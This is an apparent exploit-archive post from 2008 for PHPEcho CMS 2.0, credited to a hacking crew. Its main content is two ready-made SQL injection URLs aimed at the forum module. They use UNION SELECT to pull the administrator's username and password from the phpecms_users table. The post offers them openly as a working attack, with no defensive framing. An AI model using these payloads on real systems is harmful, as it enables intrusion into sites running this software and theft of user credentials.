23 lines
No EOL
1 KiB
Text
23 lines
No EOL
1 KiB
Text
#########################################################################
|
|
PHPEcho CMS Remote SQL Injection Exploit
|
|
#########################################################################
|
|
## Product: PHPEchoCM
|
|
## License: GPL
|
|
## For version: 2.0
|
|
## AUTHOR : Stack-Terrorist [ v40]
|
|
## HOME : http://v4-team.com
|
|
## EMAIL: v.4@hotmail.fr & dj-moad@hotmail.fr
|
|
## download script : http://sourceforge.net/project/showfiles.php?group_id=186100
|
|
|
|
## EXPLOITS :
|
|
username :
|
|
http://server.com/Path/index.php?module=forum&show=section&id=-1%20union%20select%201,username,3,4%20from%20phpecms_users%20where%20id=1/*
|
|
password :
|
|
http://server.com/Path/index.php?module=forum&show=section&id=-1%20union%20select%201,password,3,4%20from%20phpecms_users%20where%20id=1/*
|
|
|
|
## GREETZ : All members v4 Team & no-hack & tryag & soqor
|
|
#########################################################################
|
|
PHPEcho CMS Remote SQL Injection Exploit
|
|
#########################################################################
|
|
|
|
# milw0rm.com [2008-01-17] |